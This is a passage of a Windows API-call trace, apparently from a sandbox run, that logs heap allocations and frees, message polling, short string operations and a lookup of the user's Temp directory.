(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64390 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0690 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64210 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643d8 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0520 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64300 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0520 | out: hHeap=0x2af0000) returned 1 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64498 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0590 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0590 | out: hHeap=0x2af0000) returned 1 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643a8 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04e0 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04e0 | out: hHeap=0x2af0000) returned 1 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a643f0 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e05c0 [0081.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a641b0 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64300 | out: hHeap=0x2af0000) returned 1 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643d8 | out: hHeap=0x2af0000) returned 1 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64498 | out: hHeap=0x2af0000) returned 1 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643a8 | out: hHeap=0x2af0000) returned 1 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64210 | out: hHeap=0x2af0000) returned 1 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0690 | out: hHeap=0x2af0000) returned 1 [0081.314] lstrlenW (lpString="72") returned 2 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643f0 | out: hHeap=0x2af0000) returned 1 [0081.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05c0 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641b0 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64390 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64378 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0680 | out: hHeap=0x2af0000) returned 1 [0081.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64390 [0081.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64270 [0081.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0650 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64360 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643c0 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a693a8 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64000 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64270 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0650 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64390 | out: hHeap=0x2af0000) returned 1 [0081.315] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0081.315] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0650 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64270 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64450 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dd20 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63fe8 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63f88 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a53ab0 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a538d0 | out: hHeap=0x2af0000) returned 1 [0081.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a640c0 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64078 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a53a60 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64198 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64030 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a53920 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0370 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a53998 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63fd0 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e02c0 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64138 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63f70 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64150 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63fb8 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e02b0 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63f40 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0470 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63f10 | out: hHeap=0x2af0000) returned 1 [0081.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64270 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64468 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64450 | out: hHeap=0x2af0000) returned 1 [0081.342] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a53b50 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0370 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e02c0 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64468 | out: hHeap=0x2af0000) returned 1 [0081.342] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64210 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64228 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a539c0 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0370 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a642e8 | out: hHeap=0x2af0000) returned 1 [0081.342] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0560 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0560 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64408 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641c8 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643f0 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0660 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.342] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0570 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04d0 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0580 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a641c8 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64378 | out: hHeap=0x2af0000) returned 1 [0081.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a643d8 | out: hHeap=0x2af0000) returned 1 [0081.343] lstrlenW (lpString="31") returned 2 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] lstrlenW (lpString="5c") returned 2 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] lstrlenW (lpString="5c") returned 2 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] lstrlenW (lpString="37") returned 2 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.343] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.343] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] lstrlenW (lpString="39") returned 2 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] lstrlenW (lpString="37") returned 2 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] lstrlenW (lpString="31") returned 2 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] lstrlenW (lpString="32") returned 2 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] lstrlenW (lpString="32") returned 2 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.344] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.345] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.345] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.345] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.345] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.345] lstrlenW (lpString="31") returned 2 [0081.345] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.345] PeekMessageW (in: lpMsg=0x8cedf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedf0) returned 0 [0081.345] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.345] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0081.346] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cec30 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0081.346] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0081.356] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] GetLastError () returned 0x0 [0081.356] SetLastError (dwErrCode=0x0) [0081.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64678 [0081.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e51b8 [0081.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e05a0 [0081.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64618 [0081.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0600 [0081.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64558 [0081.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e51b8 | out: hHeap=0x2af0000) returned 1 [0081.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05a0 | out: hHeap=0x2af0000) returned 1 [0081.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64678 | out: hHeap=0x2af0000) returned 1 [0081.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64798 | out: hHeap=0x2af0000) returned 1 [0081.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64768 | out: hHeap=0x2af0000) returned 1 [0081.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64618 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0600 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64558 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644c8 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645d0 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64660 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645e8 | out: hHeap=0x2af0000) returned 1 [0081.357] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0081.357] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0580 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646c0 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0580 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64720 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64600 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0081.357] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0320 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64768 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64540 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64768 | out: hHeap=0x2af0000) returned 1 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64618 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0600 [0081.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64558 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0600 | out: 